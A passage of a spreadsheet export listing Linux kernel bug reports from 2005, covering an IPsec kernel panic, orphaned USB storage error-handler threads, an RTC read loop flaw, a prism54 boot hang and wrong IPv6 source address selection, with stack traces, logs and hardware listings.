[&lt;c02e5918&gt;] netif_receive_skb+0x198/0x240 [&lt;c02e5a3f&gt;] process_backlog+0x7f/0x100 [&lt;c02e5b4e&gt;] net_rx_action+0x8e/0x1c0 [&lt;c011f7cd&gt;] __do_softirq+0x8d/0xa0 [&lt;c0105493&gt;] do_softirq+0x63/0x70 ======================= [&lt;c011f8a8&gt;] irq_exit+0x38/0x40 [&lt;c0105359&gt;] do_IRQ+0x59/0x80 [&lt;c01035fe&gt;] common_interrupt+0x1a/0x20 [&lt;c0241d07&gt;] acpi_processor_idle+0x123/0x299 [&lt;c01009d8&gt;] cpu_idle+0x48/0x60 [&lt;c044b7b7&gt;] start_kernel+0x157/0x180 [&lt;c044b390&gt;] unknown_bootoption+0x0/0x1b0 Code: 0f 86 f9 00 00 00 8b 84 24 60 01 00 00 bb 40 00 00 00 29 f3 81 fb ff 01 00 00 8d 7c 06 1c 0f 87 c4 00 00 00 89 d9 89 ee c1 e9 02 &lt;f3&gt; a5 89 d9 83 e1 03 74 02 f3 a4 8b 84 24 60 01 00 00 8b b4 24 &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt Steps to reproduce: Setup IPsec &amp; wait. Sometimes 30m, sometimes 5h.</t>
  </si>
  <si>
    <t>scsi_eh not get released for USB storage device after failure or disconnect</t>
  </si>
  <si>
    <t>2005-09-06 06:17 UTC</t>
  </si>
  <si>
    <t>2005-10-12 07:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: Mandriva Linux release 2006.0 (Cooker) for i586 Hardware Environment: i686 Intel(R) Pentium(R) 4 CPU 3.00GHz Software Environment: Kernel tested: 2.6.13-mm1 with patch from http://marc.theaimsgroup.com/?l=linux-usb-devel&amp;m=112551468126219&amp;w=2 Problem Description: 1. I have tried the -mm1 patch (plus the http://marc.theaimsgroup.com/?l=linux-usb-devel&amp;m=112551468126219&amp;w=2 reset patch). Only one card reader is used. I remove the card reader while it's being read (dd if=/dev/sda of=/dev/null). Then the usb-storage driver is gone with scsi_eh_4 left. The following is the last trace messages: Sep 6 17:00:34 fsyang kernel: usb-storage: Command READ_10 (10 bytes) Sep 6 17:00:34 fsyang kernel: usb-storage: 28 00 00 01 30 40 00 00 40 00 Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x4cf L 32768 F 128 Trg 0 LUN 0 CL 10 Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 31/31 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk command transfer result=0 Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_sglist: xfer 32768 bytes, 1 entries Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 32768/32768 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk data transfer result 0x0 Sep 6 17:00:34 fsyang kernel: usb-storage: Attempting to get CSW... Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 13 bytes Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 13/13 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk status result = 0 Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk Status S 0x53425355 T 0x4cf R 0 Stat 0x0 Sep 6 17:00:34 fsyang kernel: usb-storage: scsi cmd done, result=0x0 Sep 6 17:00:34 fsyang kernel: usb-storage: *** thread sleeping. Sep 6 17:00:34 fsyang kernel: usb-storage: queuecommand called Sep 6 17:00:34 fsyang kernel: usb-storage: *** thread awakened. Sep 6 17:00:34 fsyang kernel: usb-storage: Command READ_10 (10 bytes) Sep 6 17:00:34 fsyang kernel: usb-storage: 28 00 00 01 30 80 00 00 40 00 Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x4d0 L 32768 F 128 Trg 0 LUN 0 CL 10 Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 31/31 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk command transfer result=0 Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_sglist: xfer 32768 bytes, 1 entries Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 32768/32768 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk data transfer result 0x0 Sep 6 17:00:34 fsyang kernel: usb-storage: Attempting to get CSW... Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 13 bytes Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 13/13 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk status result = 0 Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk Status S 0x53425355 T 0x4d0 R 0 Stat 0x0 Sep 6 17:00:34 fsyang kernel: usb-storage: scsi cmd done, result=0x0 Sep 6 17:00:34 fsyang kernel: usb-storage: *** thread sleeping. Sep 6 17:00:34 fsyang kernel: usb-storage: queuecommand called Sep 6 17:00:34 fsyang kernel: usb-storage: *** thread awakened. Sep 6 17:00:34 fsyang kernel: usb-storage: Command READ_10 (10 bytes) Sep 6 17:00:34 fsyang kernel: usb-storage: 28 00 00 01 30 c0 00 00 40 00 Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x4d1 L 32768 F 128 Trg 0 LUN 0 CL 10 Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 6 17:00:34 fsyang kernel: usb-storage: Status code 0; transferred 31/31 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transfer complete Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk command transfer result=0 Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_bulk_transfer_sglist: xfer 32768 bytes, 1 entries Sep 6 17:00:34 fsyang kernel: usb-storage: Status code -71; transferred 26112/32768 Sep 6 17:00:34 fsyang kernel: usb-storage: -- unknown error Sep 6 17:00:34 fsyang kernel: usb-storage: Bulk data transfer result 0x4 Sep 6 17:00:34 fsyang kernel: usb-storage: -- transport indicates error, resetting Sep 6 17:00:34 fsyang kernel: usb 5-1: USB disconnect, address 17 Sep 6 17:00:34 fsyang kernel: usb-storage: storage_disconnect() called Sep 6 17:00:34 fsyang kernel: usb-storage: usb_stor_stop_transport called Sep 6 17:00:36 fsyang kernel: usb-storage: No reset during disconnect Sep 6 17:00:36 fsyang kernel: usb-storage: usb_stor_Bulk_reset called Sep 6 17:00:36 fsyang kernel: usb-storage: No reset during disconnect Sep 6 17:00:36 fsyang kernel: usb-storage: scsi cmd done, result=0x70000 Sep 6 17:00:36 fsyang kernel: usb-storage: *** thread sleeping. Sep 6 17:00:36 fsyang kernel: usb-storage: queuecommand called Sep 6 17:00:36 fsyang kernel: usb-storage: Fail command during disconnect Sep 6 17:00:36 fsyang kernel: SCSI error : &lt;4 0 0 0&gt; return code = 0x10000 Sep 6 17:00:36 fsyang kernel: usb-storage: queuecommand called Sep 6 17:00:36 fsyang kernel: usb-storage: Fail command during disconnect Sep 6 17:00:36 fsyang kernel: SCSI error : &lt;4 0 0 0&gt; return code = 0x10000 Sep 6 17:00:36 fsyang kernel: usb-storage: -- usb_stor_release_resources Sep 6 17:00:36 fsyang kernel: usb-storage: -- sending exit command to thread Sep 6 17:00:36 fsyang kernel: usb-storage: -- dissociate_dev Sep 6 17:00:36 fsyang kernel: usb-storage: *** thread awakened. Sep 6 17:00:36 fsyang kernel: usb-storage: -- exiting 2. When stressing (reading/writing) 7 card readers simultaneously, a similar condition happens. (Actually 8 card readers are connected. But only 7 are found. I am not sure whether it's a driver problem...) I think the signal quality on USB bus seems really bad when multiple card readers are tested at the same time. (The environment is the same as http://bugzilla.kernel.org/show_bug.cgi?id=5173) Sometimes it can be found that some scsi_eh_XX is present without any corresponding USB device. I think when doing error recovery for that USB device, the scsi_eh_XX driver is accidentially replaced by another one with cancelling the original one. When one more orphan scsi_eh_XX is found, I try to stop the testing immediately. I think it still takes two or more seconds to really stop the testing. The ps result is as below: ~ 1012$ ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:30,comm | grep scsi 23474 23474 TS - 0 19 0 0.0 S - scsi_eh_119 25649 25649 TS - 0 24 0 0.0 S - scsi_eh_125 25686 25686 TS - 0 19 0 0.0 S - scsi_eh_126 25723 25723 TS - 0 19 0 0.0 S - scsi_eh_127 25760 25760 TS - 0 19 0 0.0 S - scsi_eh_128 25797 25797 TS - 0 24 0 0.0 S - scsi_eh_129 25834 25834 TS - 0 24 0 0.0 S - scsi_eh_130 25871 25871 TS - 0 24 0 0.0 S - scsi_eh_131 27074 27074 TS - 0 19 0 0.0 S - scsi_eh_132 scsi_eh_119 is caused by the previous test before this one since I was unable to save the verbose debug information in time. So that I run the tests again to cause the orphan scsi_eh_128. The device mappings is: /sys/block 1004$ ls -l sd?/device lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:59 sda/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-1/5-1.1/5-1.1:1.0/host125/target125:0:0/125:0:0:0/ lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:59 sdb/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-1/5-1.2/5-1.2:1.0/host126/target126:0:0/126:0:0:0/ lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:58 sdc/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-1/5-1.3/5-1.3:1.0/host127/target127:0:0/127:0:0:0/ lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:59 sdd/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-1/5-1.4/5-1.4:1.0/host132/target132:0:0/132:0:0:0/ lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:59 sde/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-2/5-2.1/5-2.1:1.0/host129/target129:0:0/129:0:0:0/ lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:59 sdf/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-2/5-2.2/5-2.2:1.0/host130/target130:0:0/130:0:0:0/ lrwxrwxrwx 1 root root 0 9&amp;#26376; 6 20:59 sdg/device -&gt; ../../devices/pci0000:00/0000:00:1d.7/usb5/5-2/5-2.3/5-2.3:1.0/host131/target131:0:0/131:0:0:0/ /sys/block 1006$ ls -l /proc/bus/usb/005 &amp;#32317;&amp;#35336; 0 -rw-rw---- 1 fsyang usb 43 9&amp;#26376; 6 20:28 001 -rw-rw---- 1 fsyang usb 43 9&amp;#26376; 6 20:28 002 -rw-rw---- 1 fsyang usb 43 9&amp;#26376; 6 20:28 003 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:56 016 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:56 017 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:56 018 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:56 020 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:56 021 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:56 022 -rw-rw-r-- 1 root usb 50 9&amp;#26376; 6 20:59 023 /sys/block 1007$ lsusb Bus 005 Device 023: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 022: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 021: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 020: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 018: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 017: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 016: ID 058f:6369 Alcor Micro Corp. Bus 005 Device 003: ID 05e3:0605 Genesys Logic, Inc. Bus 005 Device 002: ID 05e3:0605 Genesys Logic, Inc. Bus 005 Device 001: ID 0000:0000 Bus 004 Device 001: ID 0000:0000 Bus 003 Device 001: ID 0000:0000 Bus 002 Device 001: ID 0000:0000 Bus 001 Device 001: ID 0000:0000 The final part of /var/log/kernel/info is attached as "info1.bz2". The head is gone since I periodically cut this file when testing so that it can be kept at a reasonable size.</t>
  </si>
  <si>
    <t>RTC doesn't wait for UIP high-&gt;low transistion</t>
  </si>
  <si>
    <t>2005-09-06 12:01 UTC</t>
  </si>
  <si>
    <t>Ram Yalamanchili</t>
  </si>
  <si>
    <t>2006-12-12 03:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: kernel.org Hardware Environment: Software Environment: Problem Description: in file: arch/x86_64/kernel/time.c / get_cmos_time timeout = 1000000; last = this = 0; while (timeout &amp;&amp; last &amp;&amp; !this) { last = this; this = CMOS_READ(RTC_FREQ_SELECT) &amp; RTC_UIP; timeout--; } This code doesn't work and can lead to potential faulty reads of time from the RTC. The UIP flag should transition from high to low before reading the time. Above code is kinda screwed up.. should be an easy fix for the owner :) thanks, Ram</t>
  </si>
  <si>
    <t>kernel 2.6.13 hangs when inserting prism54 based wireless card</t>
  </si>
  <si>
    <t>2005-09-06 17:31 UTC</t>
  </si>
  <si>
    <t>S. Lorsbach</t>
  </si>
  <si>
    <t>2006-01-10 16:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12 Distribution: Gentoo See too: http://bugs.gentoo.org/show_bug.cgi?id=104659 When my kernel 2.6.13 is active and i'm inserting my wireless card (netgear wg511) in the pcmcia slot the system hangs. It still hangs when i reboot and the card is in the pcmcia slot. Then the kernel hangs befor probing for ide-interfaces (i think). There are no error messages in any log file and the Magic-SysReqKey won't work. I compiled pcmcia as kernel-module and in kernel - same result. I think it's an error in the pcmcia implementation, because i read in the kernel-changelog that there was much changed - or? Reproducible: Always Steps to Reproduce: 1. insert wireless card 2. turn on pc and boot with 2.6.13 kernel Actual Results: The system hangs without any error message. This is from my 2.6.11 kernel-boot-log, because 2.6.13 hangs, with my wireless card ---cut--- Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: IDE controller at PCI slot 0000:00:11.1 VP_IDE: chipset revision 6 VP_IDE: not 100% native mode: will probe irqs later VP_IDE: VIA vt8231 (rev 10) IDE UDMA100 controller on pci0000:00:11.1 ide0: BM-DMA at 0x1100-0x1107, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0x1108-0x110f, BIOS settings: hdc:DMA, hdd:pio ---my 2.6.13 kernel hangs now---- Probing IDE interface ide0... hda: IC25N030ATCS04-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: UJDA740 DVD/CDRW, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 acer ~ # lspci -vv 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 80) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ Latency: 8 Region 0: Memory at a0000000 (32-bit, prefetchable) [size=64M] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000c000-0000dfff Memory behind bridge: e0000000-efffffff Prefetchable memory behind bridge: 90000000-9fffffff BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0a.0 CardBus bridge: O2 Micro, Inc. OZ601/6912/711E0 CardBus/SmartCardBus Controller Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168 Interrupt: pin A routed to IRQ 11 Region 0: Memory at 1e000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 1e400000-1e7ff000 (prefetchable) Memory window 1: 1e800000-1ebff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt- PostWrite+ 16-bit legacy interface ports at 0001 0000:00:11.0 ISA bridge: VIA Technologies, Inc. VT8231 [PCI-to-ISA Bridge] (rev 10) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Region 4: I/O ports at 1100 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 1e) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 22 Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at 1200 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.4 Bridge: VIA Technologies, Inc. VT8235 ACPI (rev 10) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Capabilities: [68] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 40) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 10 Region 0: I/O ports at e000 [size=256] Region 1: I/O ports at e100 [size=4] Region 2: I/O ports at e104 [size=4] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.6 Communication controller: VIA Technologies, Inc. AC'97 Modem Controller (rev 20) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 10 Region 0: I/O ports at e200 [size=256] Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 51) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 16 (750ns min, 2000ns max), cache line size 04 Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at e800 [size=256] Region 1: Memory at f0000000 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:01:00.0 VGA compatible controller: S3 Inc. VT8636A [ProSavage KN133] AGP4X VGA Controller (TwisterK) (rev 01) (prog-if 00 [VGA]) Subsystem: Acer Incorporated [ALI]: Unknown device 001d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (1000ns min, 63750ns max), cache line size 04 Interrupt: pin A routed to IRQ 11 Region 0: Memory at e0000000 (32-bit, non-prefetchable) [size=512K] Region 1: Memory at 90000000 (32-bit, prefetchable) [size=128M] Expansion ROM at 000c0000 [disabled] [size=64K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [80] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=x4 0000:02:00.0 Network controller: Intersil Corporation Intersil ISL3890 [Prism GT/Prism Duette] (rev 01) Subsystem: Netgear WG511 Wireless Adapter Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 80 (2500ns min, 7000ns max), cache line size 10 Interrupt: pin A routed to IRQ 11 Region 0: Memory at 1e800000 (32-bit, non-prefetchable) [size=8K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME-</t>
  </si>
  <si>
    <t>Wrong source IPv6 address selected for destination</t>
  </si>
  <si>
    <t>2005-09-07 06:14 UTC</t>
  </si>
  <si>
    <t>Tomasz K&amp;#281;pczy&amp;#324;ski</t>
  </si>
  <si>
    <t>2006-07-30 10:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 4 Hardware Environment: x86_64 Problem Description: This problem has been filed on FC4 and is reported here as upstream fix (ie. in kernel) is needed. Original report: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=166636 There is a host with normal and 6to4 IPv6 connectivity and two global IPv6 addresses configured on eth0: 2: eth0: &lt;BROADCAST,MULTICAST,UP&gt; mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:0f:ea:61:98:cc brd ff:ff:ff:ff:ff:ff inet 192.168.253.2/24 brd 192.168.253.255 scope global eth0 inet6 2002:5580:5ba8:1:20f:eaff:fe61:98cc/64 scope global dynamic valid_lft 86397sec preferred_lft 43197sec inet6 2001:5c0:8a70:0:20f:eaff:fe61:98cc/64 scope global dynamic valid_lft 2591997sec preferred_lft 604797sec inet6 fe80::20f:eaff:fe61:98cc/64 scope link valid_lft forever preferred_lft forever When trying to connect to site with global normal (i.e.2001:...) IP address hosts chooses 6to4 source address and TCP connection is not established - it is stuck in SYN_SENT state: tcp 0 1 2002:5580:5ba8:1:20f::43588 2001:5c0:8a70::1:25 SYN_SENT tcp 0 1 2002:5580:5ba8:1:20f::32945 2001:200:0:8002:203:47ff:80 SYN_SENT Please note - this problem occurs on end node. Linux Box working as router to IPv6 and 6to4 seems to work fine. Adding route using ip route add ... src .. for 2001: and 2002: hasn't helped. Version-Release number of selected component (if applicable): kernel-2.6.12-1.1398_FC4 quick code review of vanilla 2.6.13 kernel shows that the problem also is there How reproducible: always Steps to Reproduce: 1. Setup linux box with normal and 6to4 connectivity 2. Try to connect to normal IPv6 site 3. If the above step works - try to connect to 6to4 site as kernel seems to pick up the first IPv6 address configured on interface 4. Step 3 or step 4 fails Actual results: Some connections from host with normal and 6to4 connectivity do not work. Expected results: All connections from host with normal and 6to4 connectivity do not work. Additional info: Kernel should choose normal global IPv6 source addrress for connections to normal global IPv6 addrresses. Kernel should choose 6to4 global IPv6 source addrress for connections to 6to4 global IPv6 addrresses. Rules for IPv6 source address selection are described in RFC3056. For now it looks like kernel picks the first address with the same scope as destination found on outgoing interface. It looks like USAGI project has this implemented in this patch: ftp://ftp.linux-ipv6.org/pub/usagi/stable/split/usagi-linux26-stable-20050714-2.6.10.diff.bz2</t>
  </si>
  <si>
    <t>Badness in send_IPI_mask_bitmask at arch/i386/kernel/smp.c:168</t>
  </si>
  <si>
    <t>2005-09-07 15:15 UTC</t>
  </si>
  <si>
    <t>2006-01-05 10:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: redhat Hardware Environment: P4 one cpu (HT) Software Environment: 2.6.13 custom built kernel Problem Description: Steps to reproduce: During shutdown (halt -p) got this console message. Badness in send_IPI_mask_bitmask at arch/i386/kernel/smp.c:168 [&lt;c0103cd7&gt;] dump_stack+0x17/0x20 [&lt;c0112286&gt;] send_IPI_mask_bitmask+0x86/0x90 [&lt;c0112689&gt;] smp_send_reschedule+0x19/0x20 [&lt;c0117e9b&gt;] resched_task+0x6b/0x90 [&lt;c01186cb&gt;] try_to_wake_up+0x2db/0x310 [&lt;c011872a&gt;] wake_up_state+0xa/0x10 [&lt;c012832b&gt;] signal_wake_up+0x2b/0x40 [&lt;c0128be0&gt;] __group_complete_signal+0x210/0x250 [&lt;c0128cb3&gt;] __group_send_sig_info+0x93/0xd0 [&lt;c0129561&gt;] do_notify_parent+0xe1/0x1c0 [&lt;c01206b6&gt;] exit_notify+0x366/0x830 [&lt;c0120e14&gt;] do_exit+0x294/0x3a0 [&lt;c012b5ef&gt;] sys_reboot+0xcf/0x160 [&lt;c0102ded&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>crash under disk stress [+4kstacks], Unable to handle kernel paging request at virtual address 08080880 @ do_page_fault</t>
  </si>
  <si>
    <t>2005-09-09 06:58 UTC</t>
  </si>
  <si>
